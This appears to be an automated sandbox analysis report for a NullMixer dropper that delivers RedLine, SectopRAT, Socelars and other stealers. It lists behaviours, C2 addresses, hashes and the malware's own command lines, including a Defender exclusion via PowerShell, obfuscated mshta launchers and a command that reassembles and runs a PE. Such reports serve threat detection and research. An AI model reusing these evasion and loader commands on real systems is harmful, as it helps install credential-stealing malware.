Analysis Overview
SHA256
35794aedc3c64761d4e13da7f7513001bb12388542ee100c3eb9fe3dba84a484
Threat Level: Known bad
The file 35794aedc3c64761d4e13da7f7513001bb12388542ee100c3eb9fe3dba84a484 was found to be: Known bad.
Malicious Activity Summary
Socelars payload
Socelars family
Nullmixer family
OnlyLogger
RedLine
SectopRAT
Onlylogger family
Redline family
Fabookie
Fabookie family
GCleaner
Sectoprat family
NullMixer
Socelars
SectopRAT payload
Detect Fabookie payload
Gcleaner family
RedLine payload
OnlyLogger payload
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
ASPack v2.12-2.42
Reads user/profile data of web browsers
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Checks installed software on the system
Looks up geolocation information via web service
Looks up external IP address via web service
Drops Chrome extension
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Program crash
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates system info in registry
Modifies Internet Explorer settings
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 00:10
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 00:10
Reported
2024-11-08 00:13
Platform
win7-20240903-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2208 set thread context of 2728 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f7843c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe
"C:\Users\Admin\AppData\Local\Temp\9265b09595c59007e116c60605c28bd616387cf0dff79c7db8c5880e23cfef8e.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat057428ebfd0d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053d2789b60d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat053bd2e87da.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05786a45dda23f71f.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0556e72238ef5897.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat056c52386ee94b16c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05a28e92796e93d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05d374c30e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat05ae182be20069e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat058b772138cf0f3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe
Sat0556e72238ef5897.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat057428ebfd0d.exe
Sat057428ebfd0d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05a28e92796e93d.exe
Sat05a28e92796e93d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe
Sat058b772138cf0f3.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ff081f766eeabb8.exe
Sat05ff081f766eeabb8.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05d374c30e.exe
Sat05d374c30e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05786a45dda23f71f.exe
Sat05786a45dda23f71f.exe
C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NKU50.tmp\Sat058b772138cf0f3.tmp" /SL5="$80192,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat058b772138cf0f3.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat056c52386ee94b16c.exe
Sat056c52386ee94b16c.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053d2789b60d.exe
Sat053d2789b60d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe
Sat0546bbc15e4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat05ae182be20069e.exe
Sat05ae182be20069e.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 536 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0546bbc15e4.exe" ) do taskkill -F -Im "%~nXU"
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Sat0546bbc15e4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 456
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat053bd2e87da.exe
C:\Windows\SysWOW64\control.exe
control .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\93060639050.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\96481972069.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{bx6U-Bro3q-jWLa-eCYlE}\86461286425.exe" /mix
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\ProgramData\Garbage Cleaner\Garbage Cleaner.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0556e72238ef5897.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\Sat0556e72238ef5897.exe" & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Sat0556e72238ef5897.exe" /f
C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe
"C:\Users\Admin\AppData\Local\Temp\f77fb5f.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 668
C:\Users\Admin\AppData\Local\Temp\f7843c4.exe
"C:\Users\Admin\AppData\Local\Temp\f7843c4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 652
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| NL | 45.133.1.182:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 127.0.0.1:49287 | tcp | |
| N/A | 127.0.0.1:49289 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | safialinks.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | auto-repair-solutions.bar | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | onepremiumstore.bar | udp |
| US | 8.8.8.8:53 | premium-s0ftwar3875.bar | udp |
| US | 8.8.8.8:53 | guidereviews.bar | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | gcl-page.biz | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| LV | 45.142.215.47:27643 | tcp | |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| UA | 194.145.227.161:80 | 194.145.227.161 | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 104.26.3.46:80 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| LV | 45.142.215.47:27643 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| US | 72.84.118.132:8080 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| FI | 65.108.20.195:6774 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp | |
| LV | 45.142.215.47:27643 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\setup_install.exe
| MD5 | d2c0ac81784893ea8836d60489528679 |
| SHA1 | 2a7bbec3d73cc75d7357d89052b99a39f2cc7258 |
| SHA256 | fffb99157b6596b90ed54dfc493e143c34bbabc262261291bb62738e7d3c070d |
| SHA512 | 4ab47b782b405d278c8600811cda54457a1cca60af5e6fde0763a44a0746f89d43205cef91f21aec95fe0d8ebcd2513d50922c8dbd311d0bf5a66d6f239b2e2f |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2844-55-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2844-52-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS4C6B9096\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
